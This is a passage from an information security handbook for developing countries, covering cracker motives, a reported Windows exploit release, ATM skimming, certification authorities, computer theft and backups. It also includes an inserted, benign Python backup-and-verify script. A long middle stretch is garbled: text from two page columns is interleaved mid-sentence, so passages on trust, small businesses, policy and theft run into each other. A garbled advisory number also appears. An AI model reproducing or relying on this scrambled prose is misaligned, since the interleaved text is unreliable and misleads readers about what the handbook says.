The same motivations exist in cyberspace, but there is an additional motive that is apparently quite compelling. Cyberspace is seen as a challenge by one group of people, often called "crackers," who regard the ability to break into accounts and be mischievous as a game or sport. In other words, they consider it an achievement to be able to break into computer accounts, databases, and network equipment just because it is there, whether or not someone has protected it. This type of behavior does not have a significant analog in the real world.

Crackers generally regard their activities as a victimless crime. What does it hurt, after all, if an account or a database is broken into, and nothing is altered or stolen? They discount the legal implications and the consequences of such actions. They also disregard the victim's feeling of insecurity that such actions are likely to generate. The analogue in the real world is knowing that someone has broken in to your home and can do so again anytime; it is an intolerable feeling.

[21] Associated Press bulletin, July 23, 2003.

Ironically, the Internet aids would-be security violators in an unfortunate manner. Some crackers build "break-in kits" that provide novice crackers the ability to employ sophisticated tools in their efforts. Such tools are often posted in well-known Usenet News Groups, where they can be inspected and downloaded by anyone with access to the Internet. While many of these kits may be harmless, one is never sure, and it is certainly possible to modify a so-called harmless kit to do real damage to the computers and accounts that are accessed with the kit. Here is a recent example of such activity:

"CERT Advisory CA-203-18 documents the latest critical Windows security hole, while CNet reports that a Windows exploit for another flaw could pave the way for a 'major worm attack':

A hacker group released code designed to exploit a widespread Windows flaw, paving the way for a major worm attack as soon as this weekend, security researchers warned.

thieves installed what looked like an ATM machine in a shopping center. When people tried to obtain money from it by entering their card and numeric passcode, the machine reported that it was unable to complete the transaction. However, it recorded the card number and passcode so that unauthorized withdrawals could be made at a later time. In a variant of this method, thieves tapped legitimate ATM machines so that they could record the information as transactions were being completed. Later, the information was used to make unauthorized withdrawals.

Although most visible cyber crimes have been traced to individuals, organizations, including governments, are also capable of manipulating aspects of cyberspace for their own purposes. Organized crime may well have an interest in manipulating the network so as to cause results that are in their interest but also represent criminal activity against others. For other organizations, it may be in their interest to manipulate the results of a poll, or even an election, to obtain falsified but favorable results for themselves. Some such groups are well funded and organized, and could in theory pursue such strategies intensively.

It's clear that the potential benefits of our new digital era are enormous. It's important that we protect those benefits by securing our physical environment, our
The warning came Friday, after infrastructure, our computers, our communications links, hackers from the Chinese X Focus security group and our information resources. The first step in doing forwarded source code to several public security lists. this lies in understanding enough of the technology to The code is for a program designed to allow an make wise decisions on how to provide the required intruder to enter Windows computers. level of security. Many of us have multiple roles: we may use these resources as individuals, we may have a The X Focus program takes advantage of a hole in the responsibility for the digital systems and services in Microsoft operating system that lets attackers break in an organization, and we may be participating to help remotely. The flaw has been characterized by some government adopt and implement policies supporting security experts as the most widespread ever found adequate security. in Windows."22 In each of these roles, we have a responsibility to This trend toward attacks of increasing power by ascertain that adequate security exists. Unfortunately, relatively unsophisticated people is a long-term trend. security in a complex environment is often only as strong as its weakest link; we must work to ensure that Not all security violations involve computers and the the components over which we have some control are Internet. Automatic teller machines (ATMs) have been sufficiently robust to defend against the threats that used for theft of confidential information. In one case, we believe exist. (in the State of Connecticut in the United States) 22CNet News.com, July 25, 2003. 26 INFORMATION SECURITY AND GOVERNMENT POLICIES Importance of Security for SME's in intellectual property assets that are held (and perhaps Developing Countries sold) by the firm. 
To the extent that goods and services sold are information products, there is the possibility that While security is important for everyone, it is of special they will be replicated illegally and distributed either for importance for small and medium enterprises in devel- free or in the gray markets, where profits accrue to the oping countries. The rewards of being able to move into thieves and not the firm that produced the work. global markets with the assistance of ICTs can be signif- icant, but the risks of doing so in an insecure manner The most obvious example of illegal copying today can are substantial. be observed in the music industry, which is fighting the distribution of "pirated" recordings, often in CD format. Many businesses have already made the transition from The protection of digitally recorded intellectual property manual operations to computer-assisted management is an unresolved issue at the moment, though there has of the business. Stand-alone computers have been been considerable effort in the industry to come to used in many aspects of business in developed grips with new technology and distribution issues, both countries for some time. Along with the introduction in the United States and around the world. As long as of new computer resources, managers have had to learn near-perfect digital copies of information products can about operational issues such as backup, maintenance, be made easily and their origin is not traced back to a software updates, and computerized audit trails, all of specific sale, the gray market for entertainment products which have implications for computer, network, and will exist. The technology used in music piracy could data security. also be deployed in other circumstances; trade secrets or other confidential information could be lifted and With the introduction of network connections, and the distributed in ways that could damage a business possibility of engaging in e-business, the systems and severely. 
Valuable assets require adequate protection. It management processes deployed need to be viewed is possible to provide this protection, but the risks and differently. Stand-alone systems are generally product- methods will be different for a firm in an e-business centered or process-centered, including inventory, mode than they were for the firm operating as a tradi- ordering, and/or processes such as manufacturing, tional business, before e-commerce evolved. general ledger, and accounts payable and receivable. Successful on-line e-business systems are organized in Towards a New Model of Trust a different way; in order to succeed, they need to be designed as customer-centric, with the system tracking The new digital environment requires us to re-evaluate the customer's progress through a search for and evalua- our notions of trust. In the real world we use a variety tion of products, placement of an order, completion of measures to decide how much to trust a person, a of the financial transaction, and tracking of the sale process, or an organization. We have our intuition, shipment. Product and process issues are still important, which is based upon past experience and match what but now they are subservient to the primary need to we observe with what we have experienced. In making track the customer's journey through the business's web such decisions, we assess a person's words, absorb site and to assemble and execute any transactions that non-verbal communications, and observe events in the customer specifies and submits on-line. Such a a rich environmental and informational context. redesign is essential for success, but requires an altern In an exchange of information in cyberspace, most ative approach to customer transaction management, an non-verbal elements of communication are missing. approach that, if implemented without caution, may When we receive a piece of electronic mail or read open the door for new forms of security breaches. 
a web page, we cannot always tell if the information is accurate and if we see that it is not correct, we do Small and medium enterprises should be aware that the not know whether the errors are the result of negligence reorientation of business systems for deployment on the or whether there is a deliberate effort to deceive us. Internet involves new types of risks. One type of risk, in In the absence of other information, we do not know particular, is new: the possible compromise or theft of if the author is the person that he or she claims to be. Information Technology Security Handbook INTRODUCTION 27 Deception occurs in the real world too, of course, but it Governments have a role in ensuring that adequate P is generally easier to determine the truth of a situation mechanisms exist so that new trust models are viable ART with physical actors and real locations. and helpful for its inhabitants. Small and medium sized enterprises, in particular, depend upon the existence of Fortunately, some help is on the way in cyberspace trust when doing business electronically. In some coun- through the concept of a certification authority. This is tries, governments believe that government agencies ONE an authority that is formally recognized as providing should act as certification agencies, either exclusively or authentication for the identity of an individual or not. In other countries, governments believe that the organization. This concept exists in the real world as certification authority function should be left to the pri- well; if you hold a national passport, your government vate sector. Regardless of the specifics of the implemen- presumably has authenticated your identity and the tation, the goal is clear. Government policy can facilitate passport is the token that you can present to prove it. 
trust mechanisms that will enable its inhabitants, indi- Similarly, if you have a license to drive a motor vehicle, vidual and organizational, to participate in e-commerce a regional or national agency of your government has activities on an equal footing with other countries. issued the license, both authenticating you and also granting you the privilege of driving a vehicle. Credit Summary card companies authenticate you through the issuance of credit cards. Your employer or school may authenti- Digital technology provides us with exciting new tools cate you through an identification card. This card may that can have a major impact on education, health, authorize your access to certain services that they are commerce, and other sectors of civil society. providing for employees or students in their domain. This technology benefits all countries and people, but Clearly, there are quite a few certification authorities in has a special attraction for developing countries in that the real world. Generally each of these authorities has a it can help to accelerate their integration into the world special purpose in authenticating you, although the economic community. The technology is still in its proof of authentication may be used for broader purposes. infancy, but it is developing rapidly. Unfortunately, as The thoroughness of the authentication differs from with other technology developments, the Internet can authority to authority; some may require detailed proof be used for good or evil. As we have seen, there are of your identity, while others may accept what you say crackers and cyber criminals using it to attack individual without validation. users and all types of organizations. Certification authorities in cyberspace share these prop- The notion of safe computing, or being "cyber safe," is erties. Various levels of certification provide for differ- an important one. 
The examples in this chapter, the rate ent degrees of assurance that the certification is cor- of incidents reported to the CERT, and the new incidents rect. Multiple certification authorities exist in cyber- reported in the press on a daily basis, show why it is space, although it's more likely that one certification important to be aware of security issue and why you will be sufficient for most or all purposes. In addition, should take steps to ensure that your business and per- with electronic certification, certificates can be 'signed' sonal computers and data are protected. This Handbook electronically in a way that provides certainty that the contains a set of current "best practices" in security certification transmitted is genuine and accurate. Such a that may assist you in implementing the policies and system of certification is more formal and quantitative procedures that are relevant to your specific situation. than the intuitive and experiential methods used in the In addition, this Handbook also includes ample refer- real world. In the digital world, we need to rely on more ences to other materials, both electronic and print, that formal methods to establish the trust required to sup- cover specific aspects of IT security. There are links to port business and financial transactions conducted over professional organizations that focus on IT security electronic networks. issues as well; all of these resources will be useful to individuals and organizations seeking to deepen their knowledge of security in a networked world. 28 INFORMATION SECURITY AND GOVERNMENT POLICIES The stakes are high for developing countries. Foreign direct investment, confidence, and trust in a developing country depend upon a secure and effective implementation of technology and infrastruc- ture. Governments, organizations, and individuals all have a part to play in assuring the security of the country's electronic and information assets. 
Knowledge of the threat is paramount; appropriate action based on such knowledge should produce an environment of trust that is conducive to progress and to realizing the benefits of the new digital age for as many inhabitants of Earth as possible.

PART TWO. SECURITY FOR INDIVIDUALS

CHAPTER 1. INTRODUCTION TO SECURITY FOR INDIVIDUALS
CHAPTER 2. UNDERSTANDING AND ADDRESSING SECURITY
CHAPTER 3. KEEPING YOUR COMPUTER AND DATA SECURE
CHAPTER 4. KEEPING YOUR OPERATING SYSTEM AND APPLICATION SOFTWARE SECURE
CHAPTER 5. MALICIOUS SOFTWARE
CHAPTER 6. SECURING SERVICES OVER NETWORKS
CHAPTER 7. TOOLS TO ENHANCE SECURITY
CHAPTER 8. PLATFORM SPECIFIC ISSUES
ADDENDUM 1. INTRODUCTION TO ENCODING AND ENCRYPTION
ADDENDUM 2. TCP/IP
ADDENDUM 3. MINI-GLOSSARY OF TECHNICAL TERMS

CHAPTER 1. INTRODUCTION

Part 2, Security for Individuals, is aimed at all computer users, from novices to experts, and should serve as a primer on how to use your personal computer safely. Covering all of the issues related to security for individuals would take hundreds of pages. Most people do not have the interest or time to read such a complete study. This summary provides the information required for a typical user to understand and implement a reasonable degree of security on his/her computer. At times, the material presented in this Handbook may over-simplify some of the more complex issues. The bibliographies provided in the Annexes offer references to print resources, electronic resources, and organizations that will aid the user in further study of IT security issues.

In the personal computer context, if you ignore security issues, the results can range from annoying but costless, to time-consuming and expensive. In a professional computing context, the problems caused by unsafe computing could jeopardize your business. In either case, someone must take responsibility for assessing the risks, developing a security plan, and executing that plan. Even with detailed knowledge of information technology (IT) security issues, you will not be able to control all aspects of your computing environment. However, if you follow the guidelines in this Handbook and survey the resources available to you, you will be able to minimize the risks and develop appropriate responses to the evolving world of information technology.

Safe computing is possible, but it takes knowledge, vigilance, and care. The language in this section will include a certain degree of technical jargon; in general, some technical terms are defined in the mini-glossary at the end of Part 2; they also appear in the full Glossary in Annex 1 of this Handbook.

The first step in devising a security strategy is to understand what "safe computing" means. If you practice safe computing, you are seeking to ensure that:

· your data and programs will not be altered or disappear unless you request it;
· your computer and programs will behave the way their designer intended (with the exception of software bugs, which are unintended flaws in program code);
· no one will use your computer, your data, or your network without your permission;
· you will not unknowingly spread computer viruses;
· you will not be annoyed as much by unwanted advertisements (spam);
· no one will watch every move you make on your computer;
· no one will capture any of the data that goes over your wired or wireless network;
· no one will steal your usernames or passwords on systems or sites that you access;
· if you enter credit card numbers or bank account information online, the data will be reasonably secure (at your end of the connection; obviously you have less control over what happens at the other end of the connection).

CHAPTER 2. UNDERSTANDING AND ADDRESSING SECURITY

At a Glance

This chapter evaluates why computer and network security are necessary. It addresses the impact of security breaches and it assesses the initial measures required to counter such breaches. The chapter also includes a list of definitions of technical terms; additional terms are defined in Annex 1.

Why are Security Measures Required?

In the early days of computing on shared systems, there were usernames, but no passwords. Passwords were added once the first malicious (or curious) users began to abuse the ability to log on via username only. Today, there are a number of reasons to think about computer and network security:

· The value of your investment in hardware equipment and software programs. Computers and software packages are expensive. Replacing them may be costly and difficult. Even if you do not lose the actual hardware and software, security problems can require a re-installation of all software programs and then re-configuration to meet your specific needs. This can be time-consuming, if not impossible, for someone with only a moderate degree of technical knowledge.
· The value of your business data. This data could include your customer lists, financial projections, or proprietary programs that you have written.
· The value of your personal data. Your personal data may not have any clear monetary value, but a loss could be expensive (see later definition of identity theft), and you should consider how much time it may take to recreate the information.
· The threat of computer criminals. As technology has advanced, a class of people who take advantage of networked computers to steal data has emerged. In some cases, they are operating for benign (or malicious) kicks or to prove to themselves or to their friends that they can do it. In some cases, they are operating for personal gain (stealing credit card information, engaging in fraudulent transactions). In any case, these people can cause inconvenience and damage; in extreme cases they may create serious problems for individuals and businesses whose data has been compromised. Since the Internet is available to users worldwide, it can be complicated, if not impossible, to trace where the attacks are coming from and to stop the intruders permanently.

Why is security lacking?

· Software programs are often developed without a focus on securing them. This happens for several reasons:
  o Ignorance - the programmer or designer did not know about the need for security;
  o Low priority - until recently, security issues did not have the visibility that they now do. As a result, even people who knew about security issues chose to ignore them;
  o Time and expense - some people think that it is more expensive and time consuming to design, code, and test for security issues during the software development process; and
  o Sloppiness - in some programming efforts, the same mistakes are made repeatedly, and some of these mistakes make security breaches possible.
· People are innovative, and motivated individuals will find ways to circumvent security or to discover errors that create security exposures.
· Normal users (potential victims of security breaches) are not sufficiently aware of the threats around them and do not make an effort to follow proper procedures for securing their data and their systems.
· Some users may be aware of security issues, but simply do not take them seriously - they assume that an attack will not be launched against them.

Assessing the Threat and the Cost of Loss

In order to understand how important security is to you, you may wish to consider a number of "what if" questions. Imagine each of the security incidents listed below and try to assess the likely results of the incident.

The key questions that you must answer are:

· Could you recover from the incident?
· How much time would it take?
· How much money would it cost?
· How would it impact your business?
· What hidden costs would there be (including loss of status or authority)?

Here are a few possible security incidents:

What if...

... someone broke into your home or office and stole your computer? For added impact, they might also take the backup disks found near the computer.

... all of the data on your machine was erased?

... all of your data was stolen? This data might include: your bank account information, a list of your usernames and passwords for web sites where you make online purchases, an important report that you are writing for work, or a school assignment that is due tomorrow and is worth 50% of the course grade.

... someone watched and memorized everything that you were doing on your computer? When you type a credit card number, they know it. When you browse a web site, they know it. When you log onto a web site or system, they are able to capture your username and password.

... your computer kept crashing when you were working on an important, time-sensitive project?

... you sent a malicious computer virus to everyone in your address book?

... your telephone bill arrived and showed that you owe the phone company more than your monthly salary for calls that you did not make?

... you received a bill for a credit card that you do not own, but the bank issuing the card is convinced that you applied for it? (And they have proof of "your" application.)

All of these situations highlight why computer security is important. Once you understand that security is important to you, the next step is to assess what a good security plan will entail:

· Will it cost you anything to implement security measures?
· How much time will it take?
· How inconvenient will it be?
· Are there things that you like to do on your computer that will become difficult or impossible?
· Can you put the security measures in place yourself or will you need help from others?

These are important questions because you need to approach security with a solid understanding of the costs in terms of money, time, and inconvenience. Without this knowledge, you might become discouraged in the process of securing your system and perhaps you would abandon the project, leaving yourself unprotected.

Will it cost you anything to become secure?

Many of the paths to good security do not require specific products, and those available commercially are fairly inexpensive. Even virus-checkers, the most common purchased security product, are available as freeware. Some organizations that offer freeware products are listed in the Annexes.

How much time will it take?

You will need to devote some time to implementing and following security measures, although this commitment should not be overwhelming. In short, you will need to install the proper software and perform some routine maintenance tasks on a regular basis.

How inconvenient will it be?

How inconvenient it will be depends on your point of view. In a security mindset, you have to think about what you are doing and you will not presume that everything is safe. For example, if someone sends you an attachment, you will decide whether you should open it or not. However, this level of caution is taken in other aspects of life. It is more convenient to cross a street whenever and wherever you wish. Nevertheless, in many places, it makes sense to check that there are no cars coming before you step into the road.

Are there things that you like to do that will be difficult or impossible?

Yes, you will have to modify your actions to some extent. Opting for increased security will prompt you to be conscious of potential problems and to avoid them whenever possible. Contemporary software packages have many attractive capabilities; however, using certain features, especially those that enhance networking and messaging, can make you vulnerable to attack. For example, you might find a web site that offers a service that you want to use. However, to access the service, you must allow it to download and run a program on your computer. If you are not sure that the people who operate the service are trustworthy, it may be better not to download the program.

Can you put the security measures in place yourself or will you need help from others?

In theory, you can be fully responsible for all aspects of security, but in practice, it may be better to share the responsibilities with others.

· Updating software programs and patches, a necessary part of being secure, is often bandwidth intensive. For someone connected to the Internet with a link running at megabit speeds, this is not a problem. However, in developing countries, bandwidth is often severely restricted and sometimes very expensive. Dialup connectivity, while sufficient for downloads, may result in high costs for connections of a long duration. It may be better to have one person download updates for common software and then to distribute copies locally. Unfortunately, this is often not as convenient as having each user work directly online.
· Many security alerts are aimed at the computer professional (although this is changing as the world becomes more security-conscious). A novice user may not know how to access these alerts. If a new user does receive the alerts, he or she may not be able to understand them or take appropriate actions in response to them. Occasionally, you may receive malicious spam claiming to be a security update from Microsoft that contains an "update" attachment. The mail, of course, is not from Microsoft and the attachment is typically a dangerous virus.
· In environments where there are a large number of machines (businesses, schools, government offices), it makes sense to have a system administrator handle some aspects of security.

If you do choose to share the tasks of securing your systems with others, you should put a good communication plan in place. More information will be provided on systems administration in other parts of this Handbook. However, assigning clear responsibilities for security procedures to a designated individual or group of individuals is an important part of the security plan.

Deciding on a personal security plan

There are many programs that address a range of computer security needs. Once you understand the threats and decide on what kinds of risks you would like to minimize or eliminate, you can take steps to put a personal security plan in place. After assessing the issues of cost, time, and inconvenience, you may decide that there are some types of threats that you will live with, at least for the time being. Your security plan will rely, to a certain extent, on software programs, but it should also include procedures, rules, and self-discipline.

Good security is a result of multiple barriers or layers. Each layer will stop certain kinds of threats. If you use a variety of barriers, you will be more successful in eliminating a variety of problems. You can use the analogy of driving a car; what do you need to do to reduce the chance that you will have an accident? Some of the techniques are:

· Keep the car in good repair;
· Drive carefully;
· If the manufacturer alerts you that there is a safety-related defect in the car, get it fixed quickly;
· Pay attention when you drive, as other drivers may cause problems for you;
· If you read in the newspaper that a bridge is broken, do not drive over it.

None of these techniques alone will keep you safe, but by employing all of them, you will be more likely to avoid an accident.

In developing a good security plan, one must take a number of partially redundant steps. Consider how you might protect a valuable piece of jewelry. You keep the jewelry in a locked box, inside your locked house, and you have an insurance policy that will replace the jewelry if it is stolen. So you have several levels of protection. Any one of these in theory would protect you from loss, but it is wiser to take all precautions. That way, if one of the methods should fail (perhaps there is an untrustworthy workman in your house, so the locked door will not help), there are still safeguards in place.

The principle that needs to be understood is that virtually all security techniques can and will fail occasionally, either due to design problems, poor implementation, or human error. This applies to tools such as virus checkers, encryption and passwords. Any tool may fail at times and you should never rely on a single method to save you from disaster.

The Role of the User in Security

The primary user of a computer clearly has a large role to play in ensuring that the computer and its software are set up with a good degree of security. In addition, other users of that computer also have a role to play in ensuring that safe computing practices are followed carefully. As we will see, one of the greatest threats to safe computing is a user who does not understand or is not sufficiently diligent about security.

Security is an Art, not a Science

There is nothing guaranteed in trying to secure your computer and network. There are always new bugs, new forms of attack, and new opportunities for breaches that arise from human error. However, if you study and follow a set of best practices in security with diligence and care, you are improving your chances of operating your system securely. It also helps to stay current with the field through web site research and the mailing lists of respected computing organizations, some of which are listed in the Annexes. Such research may help guide your security practices, particularly when new or unusual circumstances are present.

CHAPTER 3. KEEPING YOUR COMPUTER AND DATA SECURE

At a Glance

This chapter investigates ways in which you can keep your computer physically secure and ensure that its programs and data are protected from loss. Topics include physical security, backups, and authentication through the use of usernames and passwords.

Introduction

One of the best ways to master the concepts of information security is to take a rules-based approach. Starting with Physical Security, the next few chapters in Part 2 will take you through the basics of setting up security procedures for your personal computer or those of your colleagues, if you work in a small group. Information on the technical aspects of security for larger organizations or more experienced users is featured in Part 5 of this Handbook. If you are

Rule 1: Think about computer theft before it happens.

Having your computer stolen is certainly inconvenient. It may also be expensive if you have no (or insufficient) insurance. In some cases, the loss of data could expose your business or personal secrets to others. In extreme cases, a stolen computer could put you out of business. Fortunately, by following a number of simple and inexpensive measures, you can dramatically reduce the chance that your laptop or desktop will be stolen.

There are two main preventive techniques: make your computer difficult to steal and/or make it less desirable for those who would want to use it.

Make it difficult to steal and access

There are several ways to prevent a thief from taking your computer:

· Ensure that the place where you keep the computer is secure. It can be locked up in a room or it can be watched by your colleagues, if you work in an office with many employees.
Don't leave your computer comfortable with the concepts introduced here, unattended in public places such as airports. you may decide to build on your knowledge by consulting Part 5 ­ Security for Technical · Use an alarm system, if it is likely that someone Administrators. might break into your office at night, for example, Physical Security when no one is around. · Consider securing the computer to a desk or pipe The first step is to ensure that your computer is or other immovable object using heavy wire cable or physically secure. This may be a trivial or non-trivial chain. This method is often used in semi-public areas exercise, depending on what you own, where it is kept, such as libraries or schools. Many computers have a and how critical the computer and data are. convenient place to connect such a tie-down. Virtually all laptops have a connection point for a Computer Theft security cable; special cables and locks are sold for them. Computer theft is a growing problem. Computers, particularly laptops, are often very easy to steal and · If the computer has a lock to prevent the case from difficult to recover. If the thief is not interested in being opened, use it. You can also buy special screws using the computer himself, there is a strong market that cannot be undone easily. for used computers, stolen or otherwise. Some thieves do not even bother to steal the entire computer and · If there is potentially valuable information on your monitor, but will take certain parts, perhaps the computer (business data, personal information), you memory or the processor. Both items are marketable, should consider restricting logical access to it when simple to conceal and transport, and very difficult you leave it in hotel rooms or other unattended (if not impossible) to trace. locations. Logical access means actual use of the computer once you have physical access to it. 
Robust logon passwords and password-protected screen-savers are a good start in this direction (see the section on Authentication later in this chapter). Note that they only control the use of the running computer: someone who removes the disk and reads it on another machine bypasses them entirely, so data that must stay secret when the machine is stolen has to be encrypted as well (see Addendum 1 on Encryption).

· Laptops and PDAs (Personal Digital Assistants) are small and easily lost. Get in the habit of putting them away immediately when they are not in active use.

Make it less attractive to take

Few people will want to buy a used computer if it is obvious that it was stolen. A simple and inexpensive way to make it less attractive to would-be purchasers is to identify your property with non-removable tags or mark the equipment with paint. The markings can include your name or other identifying information. If you use this method, do not get any paint in ventilation slots or other openings. Be aware that marking the computer case can void your warranty.

Computers are delicate

Computers are particularly sensitive to dust and rough handling. If you operate computers in dusty environments, they should be cleaned regularly, with extra care taken that ventilation openings are not blocked. Computers are also sensitive to drops and bumps.

Other aspects of physical security

If you open up your computer to install new hardware, don't ignore the warnings about reducing electrostatic shocks – making sure that your body is grounded is essential.

Using Backups to Protect Your Data

In the last section, we addressed physical security. In this section, we will consider a different issue – ensuring that your data and your programs are secure. How do you protect your computer data from corruption or loss?

Rule 2: Make backups regularly and take steps to ensure that they will survive if your computer is physically threatened.

Data can be corrupted or lost for a number of reasons. Some of the more common ones are:

· Accidentally deleting a file;
· Accidentally storing a new file under the same name as an old one, wiping out the old one;
· A misbehaving program that alters or corrupts your data;
· A misbehaving program that deletes your data;
· A rogue program (perhaps a virus) that alters, overwrites or deletes your data;
· A hardware failure (perhaps in the hard disk, or its controller, or the processor or power supply) that destroys data;
· A fire burns your computer, or the water that is used to put out the fire renders the computer useless;
· The entire computer is stolen.

Creating backups is one solution to all of these problems. A backup is a copy of a file, or set of files, transferred onto a floppy disk or CD-ROM and put away for safekeeping. If the original file is inadvertently deleted or corrupted, the backup can be retrieved and the original file can be replaced.

Backups can be very simple (e.g. a floppy disk in your desk drawer) or they can be exceedingly complex. Many backup software packages will let you copy every file on your computer onto a magnetic tape or a series of CD-ROMs. If your computer is lost or stolen, you can buy a new computer and the backup system will restore all of your files and applications on the new computer, assuming that the architecture of the new computer is similar to that of your old one.

Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite your best efforts, they can't be prevented. However, if you have good backups, at least you won't lose your data and, in many cases, you will be able to restore your system to a stable state. Even if you lose your entire computer, with a complete set of backups you can restore the information after you purchase or borrow a replacement machine. Of course, this will only work if the backups were stored away from the computer and not lost along with the computer.

Here are some reasons why backups are a key element in computer security:

User error

People accidentally delete their files. With graphical user interfaces, it's all too easy to accidentally drag a file or folder to the wrong place. Creating periodic backups makes it possible to restore files that have been deleted accidentally, protecting you from "finger-failure" mistakes.

Hardware failure

Hardware breaks from time to time, often destroying data in the process. Disk crashes may destroy the complete disk, but if you have a backup, you can restore the data onto a new drive or system.

Software failure

Many application programs, including Microsoft Word, Excel, and Access, have been known to corrupt their data files on occasion.23 If you have a backup and your application program suddenly deletes half of your 500 x 500-cell spreadsheet, you will be able to recover your data.

Theft

Computers are easy to steal and easy to sell. Not only should you make a backup, but you should also take it out of your computer and store it in a safe place; there are many cases where backups were stolen along with the computer system.

Natural disaster

Floods, earthquakes, and fires are all effective at destroying the places where we keep our computers. Here too, it is important to keep backups off site.

Other disasters

Sometimes Mother Nature isn't to blame: gas pipes leak and cause explosions, coffee spills through ventilation holes, computers may get dropped or knocked over. In each case, backups can prevent a misfortune from turning into an irrecoverable situation.

With all of these different uses for backups, it's not surprising that there are many forms of backups in use today. In fact, the perfect backup to recover from one of these problems might be useless for another. It is useful to remember the multi-layered defense concept and employ several forms of backup systems to cover the range of risks that you face in your home or office.
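The following is an added example, not code from the Handbook: a small full-plus-incremental backup with a read-back check, on the scheme this chapter goes on to describe (a full copy now and then, copies of only the changed files in between, and a test read of the backup before you trust it). It assumes, for illustration only, that the backup destination is an ordinary directory (a second disk, a network share or removable media in practice), that "changed since the last full backup" is decided by a SHA-256 digest recorded in a hypothetical manifest.json file rather than by timestamps, and that the sample files in demo() are constructed. It also shows the failure mode the text warns about: a damaged copy in the full backup, caught by verification and masked on restore by the later incremental.

```python
"""Added example (not from the Handbook): full + incremental backup with verification."""
import hashlib
import json
import os
import shutil
import tempfile

MANIFEST = "manifest.json"   # hypothetical name for the digest list written with each backup


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def scan(src):
    """Map every file under src: relative path -> SHA-256 digest."""
    result = {}
    for root, _dirs, files in os.walk(src):
        for name in files:
            full = os.path.join(root, name)
            result[os.path.relpath(full, src)] = sha256_of(full)
    return result


def copy_files(src, dest, rel_paths):
    for rel in rel_paths:
        target = os.path.join(dest, rel)
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.copy2(os.path.join(src, rel), target)


def full_backup(src, dest):
    """Copy everything and record the digests; returns the manifest."""
    manifest = scan(src)
    os.makedirs(dest, exist_ok=True)
    copy_files(src, dest, manifest)
    with open(os.path.join(dest, MANIFEST), "w") as f:
        json.dump(manifest, f)
    return manifest


def incremental_backup(src, dest, full_dest):
    """Copy only files that are new or differ from the last FULL backup."""
    with open(os.path.join(full_dest, MANIFEST)) as f:
        baseline = json.load(f)
    current = scan(src)
    changed = {rel: d for rel, d in current.items() if baseline.get(rel) != d}
    os.makedirs(dest, exist_ok=True)
    copy_files(src, dest, changed)
    with open(os.path.join(dest, MANIFEST), "w") as f:
        json.dump(changed, f)
    return changed


def verify_backup(dest):
    """Read every backed-up file back and compare with its recorded digest.
    Returns the files that are missing or corrupt (empty list = backup is good)."""
    with open(os.path.join(dest, MANIFEST)) as f:
        manifest = json.load(f)
    bad = []
    for rel, digest in manifest.items():
        path = os.path.join(dest, rel)
        if not os.path.exists(path) or sha256_of(path) != digest:
            bad.append(rel)
    return bad


def restore(full_dest, incr_dest, target):
    """Restore = the last full backup, then the last incremental on top of it."""
    for source in (full_dest, incr_dest):
        with open(os.path.join(source, MANIFEST)) as f:
            copy_files(source, target, json.load(f))
    return scan(target)


def demo():
    """Run one cycle on constructed sample data; returns a summary dict."""
    base = tempfile.mkdtemp(prefix="backup-demo-")
    src = os.path.join(base, "home")
    full, incr, out = (os.path.join(base, d) for d in ("full", "incr", "restored"))
    os.makedirs(os.path.join(src, "letters"))
    with open(os.path.join(src, "letters", "to_bank.txt"), "w") as f:
        f.write("account statement request\n")          # constructed sample file
    with open(os.path.join(src, "budget.csv"), "w") as f:
        f.write("item,cost\nprinter,120\n")              # constructed sample file
    full_manifest = full_backup(src, full)
    # Work goes on: one file is edited, one is added ...
    with open(os.path.join(src, "budget.csv"), "a") as f:
        f.write("ink,30\n")
    with open(os.path.join(src, "notes.txt"), "w") as f:
        f.write("call the landlord\n")
    changed = incremental_backup(src, incr, full)
    # ... and the full backup's copy of budget.csv goes bad (simulated media failure).
    with open(os.path.join(full, "budget.csv"), "w") as f:
        f.write("garbage\n")
    restored = restore(full, incr, out)
    return {
        "full_count": len(full_manifest),
        "incremental": sorted(changed),
        "bad_in_full": verify_backup(full),
        "restore_matches_source": restored == scan(src),
    }


if __name__ == "__main__":
    print(demo())
```

Because each incremental here holds everything changed since the last full backup, a restore needs only the full backup plus the latest incremental; if a utility instead records changes since the previous incremental, every incremental since the full backup must be applied in order. The verification step is the one most people skip, and it is the only way to learn that a copy is unreadable before you need it.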
Electronic break-ins and vandalism

Computer attackers and malicious viruses frequently alter or delete data. Your backups may help you recover from a break-in or a virus incident.

Archival information

Backups provide archival information that lets you compare current versions of software and databases with older ones. This capability lets you determine what you've changed, intentionally or by accident. It also provides a valuable resource if you ever need to go back and reconstruct the history of a project.

Here are a few types of backup methods to be considered:

· Copy your critical files to a floppy disk or a high-density removable magnetic or optical disk.
· Copy your entire disk to a spare or "mirror" disk, or copy a disk to a folder/directory on the same disk if there is sufficient room. Obviously this will not help for catastrophic types of failure, but it does give you a copy in case of accidental deletion.
· Make periodic compressed archives of your important files.24 You can keep these backups on your primary system or you can copy them to another computer, possibly at a different location.
· Back up your files over a network or over the Internet to another computer.
· If you want high security against hard-disk failure, you may consider having two hard disks in your computer and using hardware/software that duplicates everything that is on the first disk on the second one as well. If you do this, you still need regular backups to protect against other types of problems: a mirror faithfully copies an accidental deletion or a virus's damage onto the second disk too.

23 This statement is not meant to imply that these products have more such problems than others – they are listed only because they are the most popular applications used by users.

24 Examples of compressed archives include "zip" and "tar" files that can contain very bulky information in a dense form. They are "unzipped" and individual files may be called up through fairly simple procedures. There are a number of vendors and some freeware available for file compression.

What Should You Back Up?

There are two approaches to computer backup systems:

1. Back up everything that is unique to your system except the application programs. This primarily includes your data files, but it should also include all of the files that tailor your operating system and your applications to you. It may be somewhat challenging to figure out where all of these files are kept, and it is difficult to know whether it is safe to restore them later without making other critical changes. However, you may choose to keep all of your data files in a few major directories or folders. This way, you can make backups that only contain your unique work.

2. Back up everything. With an image backup, depending on the utility you use to make it, you can restore the system in its entirety. You can also restore individual files or directories/folders selectively.

We recommend both approaches.

1. Make a complete image backup as soon as your system is set up and back the system up periodically, perhaps once every several months.

2. On a more regular basis, you should back up your personal data. Depending on the backup utility that you use, there are several basic methodologies:

a) Unless you have a massive amount of personal data, back up all of your data periodically (every few months, for example).

